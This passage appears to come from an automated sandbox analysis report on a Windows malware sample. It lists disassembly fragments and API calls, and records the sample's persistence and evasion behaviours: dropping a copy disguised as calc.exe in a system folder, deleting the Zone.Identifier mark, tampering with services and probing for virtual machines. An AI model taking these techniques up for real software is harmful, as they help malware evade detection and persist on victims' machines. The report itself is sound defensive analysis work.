                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_00835CA0 push ecx; mov dword ptr [esp], 0000ECEBh 0_2_00835CA1
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_00835CF0 push ecx; mov dword ptr [esp], 0000DEB7h 0_2_00835CF1
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_00835C40 push ecx; mov dword ptr [esp], 00004180h 0_2_00835C41
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_00835DB0 push ecx; mov dword ptr [esp], 0000F636h 0_2_00835DB1
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_00835D50 push ecx; mov dword ptr [esp], 000097F2h 0_2_00835D51
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_00835E80 push ecx; mov dword ptr [esp], 00002BE4h 0_2_00835E81
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_00835EF0 push ecx; mov dword ptr [esp], 000066B1h 0_2_00835EF1
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_00835E10 push ecx; mov dword ptr [esp], 0000AF8Ah 0_2_00835E11
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_00835E40 push ecx; mov dword ptr [esp], 00002B63h 0_2_00835E41
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_00835F90 push ecx; mov dword ptr [esp], 0000765Fh 0_2_00835F91
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_00835F50 push ecx; mov dword ptr [esp], 00000282h 0_2_00835F51
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_007E304F push ecx; ret 0_2_007E3062
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_007E3646 push ecx; ret 0_2_007E3659
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_007DD6DB push ecx; retf 0_2_007DD6F0
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_007D77DE push ecx; mov dword ptr [esp], 00004180h 0_2_007D77DF
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_007D783E push ecx; mov dword ptr [esp], 0000ECEBh 0_2_007D783F
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_007D78EE push ecx; mov dword ptr [esp], 000097F2h 0_2_007D78EF
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_007D788E push ecx; mov dword ptr [esp], 0000DEB7h 0_2_007D788F
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_007D794E push ecx; mov dword ptr [esp], 0000F636h 0_2_007D794F
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_007DD948 push edi; retf 0_2_007DD94D
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_007D79DE push ecx; mov dword ptr [esp], 00002B63h 0_2_007D79DF
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_007D79AE push ecx; mov dword ptr [esp], 0000AF8Ah 0_2_007D79AF
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_007D7A1E push ecx; mov dword ptr [esp], 00002BE4h 0_2_007D7A1F
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_007D7AEE push ecx; mov dword ptr [esp], 00000282h 0_2_007D7AEF
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_007D7A8E push ecx; mov dword ptr [esp], 000066B1h 0_2_007D7A8F
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_007D7B2E push ecx; mov dword ptr [esp], 0000765Fh 0_2_007D7B2F
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007E3646 push ecx; ret 0_2_007E3659

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Desktop\QgWIrI5nvn.exe | Executable created and started: C:\Windows\SysWOW64\udhisapi\calc.exe
Source: C:\Users\user\Desktop\QgWIrI5nvn.exe | PE file moved: C:\Windows\SysWOW64\udhisapi\calc.exe

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\QgWIrI5nvn.exe | File opened: C:\Windows\SysWOW64\udhisapi\calc.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\Desktop\QgWIrI5nvn.exe | Code function: 0_2_004010FA IsIconic | 0_2_004010FA
Source: C:\Users\user\Desktop\QgWIrI5nvn.exe | Code function: 0_2_00401307 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon | 0_2_00401307
Source: C:\Users\user\Desktop\QgWIrI5nvn.exe | Code function: 0_2_00404FF9 IsIconic,GetWindowPlacement,GetWindowRect | 0_2_00404FF9
Source: C:\Windows\SysWOW64\udhisapi\calc.exe | Code function: 1_2_004010FA IsIconic | 1_2_004010FA
Source: C:\Windows\SysWOW64\udhisapi\calc.exe | Code function: 1_2_00401307 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon | 1_2_00401307
Source: C:\Windows\SysWOW64\udhisapi\calc.exe | Code function: 1_2_00404FF9 IsIconic,GetWindowPlacement,GetWindowRect | 1_2_00404FF9
Source: C:\Users\user\Desktop\QgWIrI5nvn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\udhisapi\calc.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QgWIrI5nvn.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\QgWIrI5nvn.exe | Code function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap | 0_2_00834F20
Source: C:\Windows\System32\svchost.exe TID: 6064 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\QgWIrI5nvn.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\QgWIrI5nvn.exe | Code function: 0_2_00439132 lstrlenA,FindFirstFileA,FindClose | 0_2_00439132
Source: C:\Users\user\Desktop\QgWIrI5nvn.exe | Code function: 0_2_00437C5A __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA | 0_2_00437C5A
Source: C:\Users\user\Desktop\QgWIrI5nvn.exe | Code function: 0_2_008337E0 FindFirstFileW,GetProcessHeap,GetProcessHeap,FindNextFileW,FindClose | 0_2_008337E0
Source: C:\Windows\SysWOW64\udhisapi\calc.exe | Code function: 1_2_00439132 lstrlenA,FindFirstFileA,FindClose | 1_2_00439132
Source: C:\Windows\SysWOW64\udhisapi\calc.exe | Code function: 1_2_00437C5A __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA | 1_2_00437C5A
Source: C:\Users\user\Desktop\QgWIrI5nvn.exe | Code function: 0_2_0040B946 VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect | 0_2_0040B946
Source: svchost.exe, 00000003.00000002.508930823.00000202E1061000.00000004.00000001.sdmp | Binary or memory string: "@Hyper-V RAW
Source: svchost.exe, 00000002.00000002.257419702.000002ECAF140000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.292541714.000001897BA60000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.507203580.000001D22AF40000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.305679370.000001BACFE80000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000003.00000002.506139904.00000202DB82A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW`S
Source: calc.exe, 00000001.00000002.507137958.000000000258A000.00000004.00000001.sdmp, svchost.exe, 00000003.00000002.508890012.00000202E104C000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000002.00000002.257419702.000002ECAF140000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.292541714.000001897BA60000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.507203580.000001D22AF40000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.305679370.000001BACFE80000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000002.00000002.257419702.000002ECAF140000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.292541714.000001897BA60000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.507203580.000001D22AF40000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.305679370.000001BACFE80000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                So